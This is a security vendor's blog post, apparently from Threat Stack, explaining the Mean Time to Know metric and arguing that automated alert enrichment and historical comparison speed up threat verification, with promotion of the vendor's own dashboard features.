Mean Time to Know (or MTTK for short) is one of the most important metrics in security operations. It measures how efficient the security team is at detecting real threats. The shorter it is, the sooner you will catch an attack in progress and be able to put a stop to it, reducing the negative consequences for your organization.
But the reality is, it’s not so easy to reduce MTTK. For starters, security teams are barraged with alerts on a daily basis, requiring manual work to sift through the noise to find a signal that indicates a real issue. Add on all the other tasks that need to be done aside from alert investigations, and it’s seemingly impossible to get ahead.
This is where automation comes in. Automation not only eliminates the need to manually handle tedious tasks (like alert response). It also helps you to optimize your existing resources, empowering them to actually focus on MTTK and get it under control.
In this post, we’ll take a closer look at what MTTK is (and isn’t) and how you can leverage automation to effectively decrease it.
The Difference Between Mean Time to Detect and Mean Time to Know
For starters, let’s be sure we’re on the same page when we’re talking about MTTK. It’s not the same as Mean Time To Detect (or Mean Time to Detection, sometimes abbreviated as MTTD), which is another common security metric.
Mean Time To Detection measures how quickly you can identify something and generate an alert. It determines how fast you’re alerted when something suspicious happens anywhere on your cloud or on-premise environment. Today, most security tools keep MTTD low, so you probably receive alerts pretty quickly.
Mean Time To Know, on the other hand, measures how fast someone can sort signal from noise when they get an alert. Now, you can probably see why this number is a lot harder to make an impact on. It’s like seeing how fast you can find a tiny needle in a haystack. Next to impossible, right? With automation, however, you can make a serious impact on MTTK, bringing it down from hours or days to minutes or seconds. (For a great account of how Threat Stack went from installing an agent to detecting and remediating a security breach in less than five minutes, have a look at this post: From Agent Install to Mean Time to Know in Less Than 5 Minutes.
Let’s dive into a few aspects of security automation that will allow you to do this.
If you’re running on AWS, chances are you’re familiar with scanning abuse complaint emails or notifications. These fire when an EC2 instance is observed to be scanning another server. The instance owner will be alerted — but the details are likely to be scant. They may tell you a little bit, but they probably wouldn’t give you enough context to be useful in your efforts to investigate and respond.
In the face of an alert — an abuse complaint or otherwise — you need to know three things:
- What? What was the cause of the alert? A malicious actor? An employee mistake?
- Who? Which specific user or system triggered the alert?
- Why? Why did this happen? Was it a routine update that caused it, or has the system been compromised?
Manually investigating and enriching alerts with this kind of detail can take up significant time and can be a detriment to your MTTK. Automation, on the other hand, can accelerate MTTK by providing you with the what, who, and why of an alert, because it’s able to gather relevant data for you so you don’t need to spend time digging through logs and reports.
Threat Stack, as an example, provides you with the following information for every alert:
- Relevant network activity that shows you who did what.
- A TTY timeline so you can rewind and see exactly what happened.
- A process tree so you can see how and why the attack happened.
The moment Threat Stack alerts you of something suspicious, you can log into your dashboard and see everything you need to know on one screen. You don’t need to spend time hopping between systems and making guesses as to what happened — it’s all there for you to act on in near real time. And because we’ve correlated all of this information for you, you can be sure it’s not just another false positive, but a real issue requiring further attention.
Another piece of the puzzle when determining whether a threat is real is understanding if similar behavior has happened in the past or not. This goes beyond baselining, where you can see what activity is dubbed “normal” for your specific environment. Especially in the cloud, things are always changing, so to know if an alert is truly anomalous or not, you need to know how similar alerts have been triggered in the past.
For instance, Threat Stack will show you when the same command was run in a certain period of time (e.g., seven days). With this data, you can quickly see whether the command is running differently now than it has in the past, indicating that there may be a real issue at hand.
Or, if you see a pattern of normalized distribution of activity over time, it’s probably updates or automated activity your development team has set up. However, if you see unequal intervals of suspicious activity, it may be malware or a bad actor attempting to get in.
This automated analysis takes very little time, so you can quickly figure out:
- Whether the activity is normal (not a threat) or abnormal (probably a threat).
- What was impacted (everything or a subset of systems, applications, or users).
- Whether the activity occurs regularly (e.g., automated activity) or is an isolated incident.
Without automation, it can take hours or even days to dig into dozens of systems, endpoint tools, and servers to complete forensic analysis. And this process in and of itself is riddled with roadblocks and issues — the most notable being that you may not have access to all of these systems (and if your organization follows a least privilege policy, you probably don’t).
Past + Present Data = Real Threat Verification
At the end of the day, you need to be able to combine real-time, contextual data with historical data to determine if a threat is real. This is next to impossible done manually. If malware pivots in your console, for example, it would be very difficult to detect that manually, and certainly not in real time. So contextual and historical data collection and analysis must be done together in parallel, and the only way to do that and correlate them together is through automation.
Fight Automation With Automation
Today, many attacks are automated. It’s never been easier to spin up a new malicious domain and send out batches of phishing emails or leverage a multi-thousand computer botnet or botnets for hire. In fact, many schemes like ransomware are now being franchised, so with a little coding know-how, anyone can join the party. With attacks coming at us faster and in higher volumes than ever before, the only way to keep up and stay protected is by leveraging automation.